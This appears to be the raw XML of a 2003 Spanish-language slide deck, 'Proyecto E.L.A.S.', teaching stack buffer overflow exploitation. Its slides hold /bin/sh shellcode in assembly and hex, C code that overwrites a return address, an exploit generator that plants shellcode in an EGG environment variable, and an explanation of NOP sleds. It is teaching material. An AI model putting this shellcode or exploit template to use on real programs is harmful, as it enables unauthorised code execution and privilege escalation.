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EAC-557C-431E-83A5-10905FB8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328-E274-47A7-BB33-BCF8C64F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437-B8C6-44AA-B9B4-3208A38A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F65-71C7-4ABA-B2B2-C62E6A01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933-2B32-48BF-9E0C-55457F8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9AB-E157-4573-8281-ABE0BDF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535-F8E0-4DA5-A193-679F35A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650-76EA-4D5A-AFF4-41F7C293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340-9B65-43F1-92D8-E7B0C224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7DD-68FB-4B83-9095-AF56F91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E00-D8ED-4783-A756-F085C77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E08-30C3-4769-AC4E-409AB5D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6D73-5B2A-4B50-A880-02DC13260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733320"/>
            <a:ext cx="7807320" cy="11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oyecto E.L.A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6320" y="1906200"/>
            <a:ext cx="8250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aques basados en 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Buffer Overf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demos cambiar la direccion de retorno de una funcion desbordando el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mbiaremos la direccion de retorno para que apunte al codigo que queremos ejecu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 codigo sera una shell de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 codigo estara en la pila, dentro del buffer que queremos desbor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 codigo que genera una shell de UNIX lo llamaremo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00D-DB14-4B6A-9B56-C100F29D67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006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809880"/>
            <a:ext cx="2438280" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6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hell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84800" y="3373560"/>
            <a:ext cx="41220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576108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3320" y="3962520"/>
            <a:ext cx="663480" cy="1904760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2032" h="5356">
                <a:moveTo>
                  <a:pt x="0" y="5355"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2031" y="5355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203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05280" y="2239920"/>
            <a:ext cx="2040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94400" y="5380200"/>
            <a:ext cx="39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2960" y="2273400"/>
            <a:ext cx="3830760" cy="3724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hellcode = "......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functi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16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 shellco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4400" y="3379680"/>
            <a:ext cx="29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3840" y="5170320"/>
            <a:ext cx="45216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8080" y="3754440"/>
            <a:ext cx="82368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2743200"/>
            <a:ext cx="24382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352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809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5715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572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952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4F2-54A8-4CE9-9E66-CC5A876FF2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52480" y="2819520"/>
            <a:ext cx="0" cy="533160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="108000">
            <a:solidFill>
              <a:srgbClr val="33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1752480"/>
            <a:ext cx="3124080" cy="37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mp    0x1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opl   %e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0x8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a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%eax,0x7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ax,0xc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$0xb,%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8(%esi),%ec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c(%esi),%e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bx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b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c    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-0x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string \"/bin/sh\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14436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63196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4960" y="1143000"/>
            <a:ext cx="3703680" cy="1713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*name[2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ame[0] = "/bin/sh"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ame[1] = NUL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xecve(name[0], name, NULL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xit(0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981080"/>
            <a:ext cx="733320" cy="3200400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2243" h="9606">
                <a:moveTo>
                  <a:pt x="54" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2242" y="9605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="9605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72400" y="2133720"/>
            <a:ext cx="411120" cy="2895480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1256" h="8646">
                <a:moveTo>
                  <a:pt x="0" y="8645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1255" y="8645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255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1840" y="5468760"/>
            <a:ext cx="29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05680" y="58294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1828800"/>
            <a:ext cx="1074600" cy="4081320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3130" h="11953">
                <a:moveTo>
                  <a:pt x="0" y="11952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3129" y="11952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3129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6840" y="5533920"/>
            <a:ext cx="349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22880" y="5648400"/>
            <a:ext cx="334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4114800"/>
            <a:ext cx="1403280" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="108000">
            <a:solidFill>
              <a:srgbClr val="33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7720" y="308124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2000" y="1339920"/>
            <a:ext cx="1538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9480" y="5927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8240" y="5318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00280" y="4784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8320" y="609588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7240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648320" y="502920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648320" y="205092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7480" y="3389400"/>
            <a:ext cx="2809800" cy="3306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opl   %e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0x8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a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%eax,0x7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ax,0xc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$0xb,%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8(%esi),%ec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c(%esi),%e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bx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b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c    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string \"/bin/sh\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648320" y="578484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525132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A99-3AA1-4F6D-B61B-83F0BEF7FD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638680" y="1676520"/>
            <a:ext cx="29718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14436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243684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720" y="3147840"/>
            <a:ext cx="18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2680" y="1781280"/>
            <a:ext cx="4388040" cy="38574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eb\x1f\x5e\x89\x76\x08\x31\xc0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8\x46\x07\x89\x46\x0c\xb0\x0b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9\xf3\x8d\x4e\x08\x8d\x56\x0c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cd\x80\x31\xdb\x89\xd8\x40\xcd"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0\xe8\xdc\xff\xff\xff/bin/sh"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 =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int *)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&amp;ret + 2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*ret) = (int)shellcod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676520"/>
            <a:ext cx="29718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320" y="3505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3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63832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6383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76720" y="47862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1480" y="51498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91840" y="5454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4080" y="3581280"/>
            <a:ext cx="6883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4520" y="1676520"/>
            <a:ext cx="9410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518080" y="4267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0480" y="1828800"/>
            <a:ext cx="304920" cy="380988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lnTo>
                  <a:pt x="1104" y="384"/>
                </a:ln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15F-7AD3-4DB0-8781-9D98D3015B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093-0D75-44AE-ABF1-033AB29286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mos visto como ejecutar nuestro shellcode cambiando la direccion de re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mos a ver como desbordar el buffer de forma que sobreescriba la direccion de re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BD8-E72E-4580-94AC-27511CC66D9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11268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2560" y="196200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1438200"/>
            <a:ext cx="4692600" cy="4804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eb\x1f\x5e\x89\x76\x08\x31\xc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8\x46\x07\x89\x46\x0c\xb0\x0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9\xf3\x8d\x4e\x08\x8d\x56\x0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cd\x80\x31\xdb\x89\xd8\x40\xc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0\xe8\xdc\xff\xff\xff/bin/sh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large_string[128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96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ong *long_ptr=(long *)large_strin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32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long_ptr + i) = (int) buff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strlen(shellcode)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arge_string[i] = shellcode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large_strin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4008600"/>
            <a:ext cx="189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08800" y="633420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76400" y="60418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68560" y="6008760"/>
            <a:ext cx="349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29280" y="6137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43840" y="17780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hell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87640" y="4749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93880" y="442260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ng_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0600" y="4441680"/>
            <a:ext cx="3268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29280" y="4568760"/>
            <a:ext cx="371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0240" y="119232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09040" y="743040"/>
            <a:ext cx="69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913960" y="4791240"/>
            <a:ext cx="1440" cy="17618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08920" y="1557360"/>
            <a:ext cx="1800" cy="1866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81840" y="28224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rge_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3960" y="53053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43560" y="1600200"/>
            <a:ext cx="2362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343560" y="2362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19880" y="4419720"/>
            <a:ext cx="2303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419880" y="4724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19880" y="502920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19880" y="601992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419880" y="63244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43560" y="2362320"/>
            <a:ext cx="2362320" cy="1447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43560" y="2362320"/>
            <a:ext cx="23623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419880" y="5029200"/>
            <a:ext cx="2286000" cy="1599840"/>
            <a:chOff x="6419880" y="5029200"/>
            <a:chExt cx="2286000" cy="1599840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="301" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6419880" y="5029200"/>
              <a:ext cx="2286000" cy="159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19880" y="5029200"/>
              <a:ext cx="2286000" cy="84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hell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952160" y="240048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rge_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73080" y="5095800"/>
            <a:ext cx="61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9120" y="52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218-8977-49D3-A0FA-BEDBC5E8D3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la practica intentaremos explotar el buffer de otro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sabemos en que direccion de memoria el programa coloca el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c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rmalmente, todos los programas tienen la pila en la misma dir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scaremos la direccion del buffer modificando el desplazamiento del shellcode dentro de la p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90D-CE60-4638-84A9-57DA206E145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809880"/>
            <a:ext cx="2209680" cy="2438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lloc(bsize)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3048120"/>
            <a:ext cx="2209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1040" y="144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2095560"/>
            <a:ext cx="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2520" y="1046160"/>
            <a:ext cx="3843360" cy="1499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int argc, char *argv[]) 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512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f (argc &gt; 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argv[1]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54480" y="1046160"/>
            <a:ext cx="4730760" cy="5655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#define DEFAULT_OFFSET               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#define DEFAULT_BUFFER_SIZE                    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eb\x1f\x5e\x89\x76\x08\x31\xc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8\x46\x07\x89\x46\x0c\xb0\x0b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9\xf3\x8d\x4e\x08\x8d\x56\x0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cd\x80\x31\xdb\x89\xd8\x40\xc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0\xe8\xdc\xff\xff\xff/bin/sh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unsigned long get_sp(void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__asm__("movl %esp,%eax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int argc, char *argv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*buff, *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ong *addr_ptr,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offset = DEFAULT_OFFSE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bsize = DEFAULT_BUFFER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uff = malloc(bsiz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ddr = get_sp() - off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rintf("Using address: 0x%x\n", add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tr = buf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ddr_ptr = (long *) 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bsize; i+=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addr_ptr++) =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tr += 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strlen(shellcode); i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ptr++) = shellcode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uff[bsize - 1] = '\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emcpy(buff,"EGG=",4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ntenv(buf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ystem(/bin/ba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9160" y="3795840"/>
            <a:ext cx="845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tr, b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3809880"/>
            <a:ext cx="2209680" cy="2438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41148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3809880"/>
            <a:ext cx="22096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GG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60520" y="3052800"/>
            <a:ext cx="2197080" cy="3576600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 2197080"/>
              <a:gd name="textAreaRight" fmla="*/ 2196720 w 2197080"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3576600"/>
              <a:gd name="textAreaBottom" fmla="*/ 3576240 h 3576600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="35160">
                <a:moveTo>
                  <a:pt x="17" y="0"/>
                </a:moveTo>
                <a:arcTo wR="17" hR="17" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="35143"/>
                </a:lnTo>
                <a:arcTo wR="17" hR="17" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21583" y="3516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43200" y="2787480"/>
            <a:ext cx="65484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92640" y="5987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\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A5F-C9F6-4D5D-B071-6A64BFCAD7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760" y="2292480"/>
            <a:ext cx="264960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5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733920"/>
            <a:ext cx="198108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4876920"/>
            <a:ext cx="304920" cy="38088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C39-C550-49DD-AFE9-E2BE65B83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B5C-6472-43D7-9670-0BF2B16A460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2292480"/>
            <a:ext cx="2649600" cy="1006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Illegal in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4876920"/>
            <a:ext cx="304920" cy="114300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AF5-76E3-4213-9B1D-99AB734E5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000" y="2292480"/>
            <a:ext cx="2957400" cy="1006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1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Illegal in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666880"/>
            <a:ext cx="685800" cy="335304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41F-B356-4F32-B693-F96FC057D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8120" y="2292480"/>
            <a:ext cx="274104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5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bc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1240" y="373392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58000" y="384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3962520"/>
            <a:ext cx="152280" cy="205740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733920"/>
            <a:ext cx="1752480" cy="1752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A54-BF7D-45D4-A34E-951C007526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 tenemos que adivinar la posicion exacta donde empieza nuestro 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cion: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iremos instrucciones NOP (1 solo byte) al principio del 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3AD-48E6-4562-B16C-3841536F66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057400"/>
            <a:ext cx="2133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1320" y="3733920"/>
            <a:ext cx="21333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52880" y="2119320"/>
            <a:ext cx="5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960" y="4710240"/>
            <a:ext cx="79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3505320"/>
            <a:ext cx="38124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3048120"/>
            <a:ext cx="609840" cy="29718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2438280"/>
            <a:ext cx="838440" cy="358164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2057400"/>
            <a:ext cx="213372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3733920"/>
            <a:ext cx="2133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91800" y="4710240"/>
            <a:ext cx="79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3505320"/>
            <a:ext cx="38088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2971800"/>
            <a:ext cx="609480" cy="304812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2438280"/>
            <a:ext cx="838080" cy="358164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3352680"/>
            <a:ext cx="838440" cy="304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2895480"/>
            <a:ext cx="838440" cy="304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2362320"/>
            <a:ext cx="838440" cy="3045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16200" y="1714680"/>
            <a:ext cx="74016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22096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3AC-7FB8-4733-9043-897E7BA6F2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rack vol 49, articulo 14: “Smashing the stack for fun and prof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98E-FEEC-4C4D-B3DC-0E2500A6DBEE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D76-2104-4A77-840B-0F9DBAA74F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88080" y="3162240"/>
            <a:ext cx="1940040" cy="2359080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1940040"/>
              <a:gd name="textAreaRight" fmla="*/ 1939680 w 1940040"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 2359080"/>
              <a:gd name="textAreaBottom" fmla="*/ 2358720 h 2359080"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="26265">
                <a:moveTo>
                  <a:pt x="16" y="0"/>
                </a:moveTo>
                <a:arcTo wR="16" hR="16" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="26249"/>
                </a:lnTo>
                <a:arcTo wR="16" hR="16" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21584" y="2626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86280" y="5264280"/>
            <a:ext cx="1941840" cy="298440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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0680" y="377640"/>
            <a:ext cx="83484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981080"/>
            <a:ext cx="1963440" cy="3581640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1963440"/>
              <a:gd name="textAreaRight" fmla="*/ 1963080 w 1963440"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3581640"/>
              <a:gd name="textAreaBottom" fmla="*/ 3581280 h 3581640"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="39399">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:arcTo wR="15" hR="15" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="39384"/>
                </a:lnTo>
                <a:arcTo wR="15" hR="15" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21585" y="39399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9360" y="3100320"/>
            <a:ext cx="196380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1160" y="4308480"/>
            <a:ext cx="19638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99880" y="2344680"/>
            <a:ext cx="825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di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01680" y="350352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02040" y="4751280"/>
            <a:ext cx="43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360" y="1963800"/>
            <a:ext cx="166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cion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moria ba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360" y="4905360"/>
            <a:ext cx="166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cion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moria al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9160" y="2730600"/>
            <a:ext cx="1440" cy="20350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78360" y="1989000"/>
            <a:ext cx="1962360" cy="3573720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 360 w 1962360"/>
              <a:gd name="textAreaRight" fmla="*/ 1962000 w 1962360"/>
              <a:gd name="textAreaTop" fmla="*/ 360 h 3573720"/>
              <a:gd name="textAreaBottom" fmla="*/ 3573360 h 3573720"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="21600" h="39333">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:arcTo wR="15" hR="15" stAng="16200000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="0" y="39318"/>
                </a:lnTo>
                <a:arcTo wR="15" hR="15" stAng="10800000" swAng="-5400000"/>
                <a:lnTo>
                  <a:pt x="21585" y="3933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6280" y="3164040"/>
            <a:ext cx="1941840" cy="299880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4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8560" y="1616040"/>
            <a:ext cx="43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4120" y="3186000"/>
            <a:ext cx="452160" cy="3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4120" y="5184720"/>
            <a:ext cx="482400" cy="3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8000" y="3830760"/>
            <a:ext cx="11268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cal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 fu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52440" y="5843520"/>
            <a:ext cx="1957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: Base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: Stack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6560" y="2413080"/>
            <a:ext cx="60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ib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37120" y="4572000"/>
            <a:ext cx="144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5040" y="3111480"/>
            <a:ext cx="1440" cy="96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54400" y="3340080"/>
            <a:ext cx="552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99080" y="2765160"/>
            <a:ext cx="0" cy="276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740360" y="539100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55627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1981080"/>
            <a:ext cx="1447920" cy="2362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49F-D8E0-4A28-A943-E212ABCAAF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680" y="1066680"/>
            <a:ext cx="4068720" cy="2114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rmAutofit/>
          </a:bodyPr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function (int a, int b, int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1[5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2[1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unction (1, 2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277440"/>
            <a:ext cx="4068720" cy="34084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$4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$8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96120" y="50212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95400" y="46958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4640" y="16002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6080" y="4692600"/>
            <a:ext cx="395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3200" y="47214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13720" y="478620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81320" y="16002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0" y="6529320"/>
            <a:ext cx="1938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2440" y="640080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2080" y="108576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28880" y="5943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28880" y="5622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0320" y="533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5040" y="4838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45040" y="17384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523880"/>
            <a:ext cx="1905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862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166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471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69040" y="20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277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081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386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69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995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300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69040" y="29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2600" y="3352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600" y="3701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2600" y="4006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2600" y="431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A1A-433B-4DD3-A4C1-5EB276DA72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1FE-106F-4E08-B928-9470A3E8BB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6080" y="968400"/>
            <a:ext cx="4052880" cy="26128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rmAutofit/>
          </a:bodyPr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function (int a, int b, int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1[5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2[1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rcpy(buffer1, "012345689ABCDEF0123456789ABCDEF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unction (1, 2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11920" y="478620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080" y="3657600"/>
            <a:ext cx="4052880" cy="31161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$4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$8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6120" y="50212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95400" y="46958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4640" y="16002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6080" y="4692600"/>
            <a:ext cx="395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3200" y="47214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1320" y="16002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6529320"/>
            <a:ext cx="1938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02440" y="640080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2080" y="108576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28880" y="5943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28880" y="5622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0320" y="533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4838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5040" y="17384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1523880"/>
            <a:ext cx="1905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862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166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471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69040" y="20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77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081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386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69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995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300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69040" y="29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2600" y="3352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2600" y="3701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2600" y="4006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600" y="431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743200"/>
            <a:ext cx="1905120" cy="2514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   1   2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4   5   6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8   9   A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   D   E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   1   2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4   5   6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8   9   A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   D   E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D4A-7E9F-40DE-9AAD-2CD0BA0042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4453920"/>
            <a:ext cx="5257800" cy="22456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a &lt;main+26&gt;:    push   $0x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c &lt;main+28&gt;:    push   $0x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e &lt;main+30&gt;:    push   $0x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90 &lt;main+32&gt;:    call   0x8048328 &lt;function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3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0x8048395 &lt;main+37&gt;:    add    $0x10,%es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98 &lt;main+40&gt;:    movl   $0xa,0xfffffffc(%eb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ourier New"/>
                <a:ea typeface="HG Mincho Light J"/>
              </a:rPr>
              <a:t>0x804839f &lt;main+47&gt;:    sub    $0x8,%es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2 &lt;main+50&gt;:    pushl  0xfffffffc(%eb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5 &lt;main+53&gt;:    push   $0x804840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a &lt;main+58&gt;:    call   0x8048268 &lt;printf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146240"/>
            <a:ext cx="3986280" cy="3193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function(int a, int b, int c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1[5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2[1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 = buffer1 + 28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*ret) += 1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x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 =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1,2,3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3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x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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="HG Mincho Light J"/>
              </a:rPr>
              <a:t>printf("%d\n",x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13720" y="478620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4880" y="91440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96120" y="51577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95400" y="48322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34640" y="13716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4280" y="4829040"/>
            <a:ext cx="395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81320" y="485784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81320" y="13716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19600" y="6605640"/>
            <a:ext cx="1938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2440" y="647712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8880" y="6080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28880" y="5759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30320" y="5470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5040" y="497520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5040" y="15098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295280"/>
            <a:ext cx="1905120" cy="508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998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303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2608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69040" y="216540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913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2180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522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827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4132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437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69040" y="306540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4784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08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5394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699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0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2600" y="3489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2600" y="3838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2600" y="4143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2600" y="44481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65240" y="1355760"/>
            <a:ext cx="315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1447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67F-AA92-4FF5-92EF-600838A159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E1B-9C1A-4FD2-A51A-F4091ECB06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33:37Z</dcterms:created>
  <dc:creator>Emilio Mira Alfaro</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>santi</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-07-31T15:22:01Z</dcterms:modified>
  <cp:revision>100</cp:revision>
  <dc:subject/>
  <dc:title>Proyecto E.L.A.S.</dc:title>
</cp:coreProperties>
</file>